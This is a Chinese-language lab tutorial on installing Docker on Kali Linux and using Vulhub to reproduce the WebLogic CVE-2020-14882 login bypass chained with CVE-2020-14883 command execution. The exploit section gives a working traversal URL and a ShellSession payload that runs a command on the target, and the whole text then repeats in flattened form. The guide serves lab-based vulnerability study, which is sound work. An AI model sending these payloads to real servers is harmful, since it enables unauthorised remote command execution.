kali配置docker环境及利用vulhub复现cve-2020-14882
字数 1121 2025-08-13 21:33:17

Kali Linux配置Docker环境及利用Vulhub复现CVE-2020-14882漏洞指南

一、Docker环境配置

1. 准备工作

在Kali Linux中配置Docker环境需要执行以下步骤:

  1. 更新系统源镜像:

    apt-get update
    
  2. 安装必要的协议和证书:

    apt-get install -y apt-transport-https ca-certificates
    apt-get install dirmngr
    

2. 添加Docker GPG密钥和源

  1. 添加GPG密钥:

    curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
    
  2. 添加Docker源:

    echo 'deb https://download.docker.com/linux/debian stretch stable' > /etc/apt/sources.list.d/docker.list
    

3. 安装Docker

  1. 再次更新系统:

    apt-get update
    
  2. 安装Docker CE:

    apt-get install docker-ce
    

    在安装过程中出现Y/N提示时选择Y。

  3. 启动Docker服务:

    service docker start
    
  4. 安装Docker Compose:

    apt install docker-compose
    

4. 验证安装

  1. 运行测试容器:

    docker run hello-world
    

    如果看到欢迎信息,说明Docker安装成功。

  2. 查看Docker版本:

    docker version
    

二、Vulhub漏洞环境搭建

1. 下载Vulhub

Vulhub是一个漏洞靶场,包含多种漏洞环境:

git clone https://github.com/vulhub/vulhub.git

如果下载速度慢,可以先在本地下载再传输到Kali中。

2. 启动Weblogic漏洞环境

  1. 进入Weblogic漏洞目录:

    cd vulhub/weblogic/CVE-2020-14882
    
  2. 启动环境:

    sudo docker-compose up -d
    

    成功后会显示绿色的"done"。

三、CVE-2020-14882漏洞复现

1. 漏洞概述

  • CVE-2020-14882:可以绕过登录,通过特定路径直接进入后台,但权限较低
  • CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令
  • 组合这两个漏洞可通过GET请求在远程Weblogic服务器上以未授权身份执行命令

受影响版本

  • WebLogic 10.3.6.0.0
  • WebLogic 12.1.3.0.0

2. 漏洞利用

权限绕过(CVE-2020-14882)

访问以下URL可直接绕过登录进入后台:

/console/css/%252e%252e%252fconsole.portal

(%252e%252e%252f是../的URL编码)

命令执行(CVE-2020-14883)

通过com.tangosol.coherence.mvel2.sh.ShellSession执行命令:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")

虽然会返回404错误,但命令已执行。

3. 验证漏洞

进入Kali中的Weblogic容器目录,检查/tmp/success1文件是否创建成功,确认漏洞复现成功。

四、总结

本教程详细介绍了在Kali Linux中配置Docker环境的完整步骤,以及如何利用Vulhub搭建Weblogic漏洞环境并复现CVE-2020-14882和CVE-2020-14883组合漏洞。关键点包括:

  1. Docker环境的正确配置和验证
  2. Vulhub漏洞环境的下载和启动
  3. CVE-2020-14882权限绕过漏洞的利用方法
  4. CVE-2020-14883命令执行漏洞的利用方法
  5. 漏洞复现后的验证方法

通过这个实践,可以加深对Weblogic漏洞的理解,并为后续的漏洞研究和安全测试打下基础。

Kali Linux配置Docker环境及利用Vulhub复现CVE-2020-14882漏洞指南 一、Docker环境配置 1. 准备工作 在Kali Linux中配置Docker环境需要执行以下步骤: 更新系统源镜像: 安装必要的协议和证书: 2. 添加Docker GPG密钥和源 添加GPG密钥: 添加Docker源: 3. 安装Docker 再次更新系统: 安装Docker CE: 在安装过程中出现Y/N提示时选择Y。 启动Docker服务: 安装Docker Compose: 4. 验证安装 运行测试容器: 如果看到欢迎信息,说明Docker安装成功。 查看Docker版本: 二、Vulhub漏洞环境搭建 1. 下载Vulhub Vulhub是一个漏洞靶场,包含多种漏洞环境: 如果下载速度慢,可以先在本地下载再传输到Kali中。 2. 启动Weblogic漏洞环境 进入Weblogic漏洞目录: 启动环境: 成功后会显示绿色的"done"。 三、CVE-2020-14882漏洞复现 1. 漏洞概述 CVE-2020-14882 :可以绕过登录,通过特定路径直接进入后台,但权限较低 CVE-2020-14883 :允许后台任意用户通过HTTP协议执行任意命令 组合这两个漏洞可通过GET请求在远程Weblogic服务器上以未授权身份执行命令 受影响版本 : WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 2. 漏洞利用 权限绕过(CVE-2020-14882) 访问以下URL可直接绕过登录进入后台: (%252e%252e%252f是../的URL编码) 命令执行(CVE-2020-14883) 通过 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令: 虽然会返回404错误,但命令已执行。 3. 验证漏洞 进入Kali中的Weblogic容器目录,检查 /tmp/success1 文件是否创建成功,确认漏洞复现成功。 四、总结 本教程详细介绍了在Kali Linux中配置Docker环境的完整步骤,以及如何利用Vulhub搭建Weblogic漏洞环境并复现CVE-2020-14882和CVE-2020-14883组合漏洞。关键点包括: Docker环境的正确配置和验证 Vulhub漏洞环境的下载和启动 CVE-2020-14882权限绕过漏洞的利用方法 CVE-2020-14883命令执行漏洞的利用方法 漏洞复现后的验证方法 通过这个实践,可以加深对Weblogic漏洞的理解,并为后续的漏洞研究和安全测试打下基础。